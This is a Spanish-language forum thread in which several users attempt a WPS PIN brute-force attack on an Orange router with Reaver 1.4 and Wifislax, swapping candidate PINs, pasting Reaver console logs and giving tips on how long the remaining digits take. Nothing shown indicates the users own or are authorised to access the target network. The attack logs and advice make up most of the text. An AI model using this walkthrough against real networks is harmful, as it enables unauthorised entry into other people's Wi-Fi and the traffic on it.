Vale de acuerdo voy probar los 3 pines que tu me has dado si lo saco te lo comento por aqui y si no lo saco tambien muchas gracias P4nd3m0n1um. Haber si tengo suerto

lekaja : Tu lo has probado estos pines que ha puesto nuestro compañero P4nd3m0n1um ?  Dime en que porcentaje se te keda cada pin que probastes yo lo voy a intentar aora haber si hay suerte.

P4nd3m0n1um: Tengo el wifilax 4.3 version final voy a probarlo hay escuchame donde me recomiendas que haga la prueba con estos pines en reaver 1.4 o el wpscragui y con que comando me recomiendas mejor para hacerlo con el de  -p verdad para meter el pin .

Probando estoy el primer pin de pandemonium,...la asociación es instantánea prácticamente....el M1,M2,M3,M4 es "reconocido" y aceptado por el router....




Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

• Waiting for beacon from 00:19:70:YY:XY:YY
• Associated with 00:19:70:YY:XY:YY (ESSID: Orange-YYYx)
• 90.91% complete @ 2012-12-25 12:44:55 (0 seconds/pin)
• 90.91% complete @ 2012-12-25 12:46:14 (0 seconds/pin)
• 90.92% complete @ 2012-12-25 12:47:14 (232 seconds/pin)
• 90.93% complete @ 2012-12-25 12:48:06 (142 seconds/pin)
• 90.93% complete @ 2012-12-25 12:49:02 (170 seconds/pin)
• 90.93% complete @ 2012-12-25 12:50:13 (205 seconds/pin)
• 90.95% complete @ 2012-12-25 12:51:25 (120 seconds/pin)
• 90.95% complete @ 2012-12-25 12:52:21 (134 seconds/pin)
• 90.95% complete @ 2012-12-25 12:53:16 (148 seconds/pin)

Estaba sin el -vv....

• Sending EAPOL START request
• Received identity request
• Sending identity response
• Received M1 message
• Sending M2 message
• Received M3 message
• Sending M4 message
• Received WSC NACK
• Sending WSC NACK
• Trying pin 42866237

^C

• Session saved.

Ya continuaré experimentando...estoy con la alfa awuso36h desde el salón y no la mejor ubicación para este orange...sólo he probado un pin completo 42866230,directamente me ha pasado al 90,91%.....luego ha seguido probando con el último número del pin hasta estancarse en el 7...

con el otro pin,después de tirarse un rato con el ,se pasa a probar con el último acabado en 0 y ahí se queda..lo curioso es que da los M1,M2,M3,M4 igual que con el otro pin...

• 90.91% complete @ 2012-12-25 13:18:58 (0 seconds/pin)
• Trying pin 47838390
• Sending EAPOL START request
[!] WARNING: Receive timeout occurred

• Sending EAPOL START request
• Received identity request
• Sending identity response
[!] WARNING: Receive timeout occurred

• Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

• Trying pin 47838390
• Sending EAPOL START request
[!] WARNING: Receive timeout occurred

• Sending EAPOL START request
• Received identity request
• Sending identity response
• Received identity request
• Sending identity response
• Received M1 message
• Sending M2 message
• Received M3 message
• Sending M4 message
[!] WARNING: Receive timeout occurred

• Sending WSC NACK
• Trying pin 47838390

@malamadre67: En teoría si estas en 90% es que ya encontraste los primeros 4 dígitos. "4286" Solamente te faltarian 4, que por lo general el ataque no dura mas de 3hs.. pero habría que verlo..

@elsevi: Bien eso esta bien, pues no tendría que ser tan simple..

Si el Wash te dice que si, es que tiene.. o WPSpy, WPScan..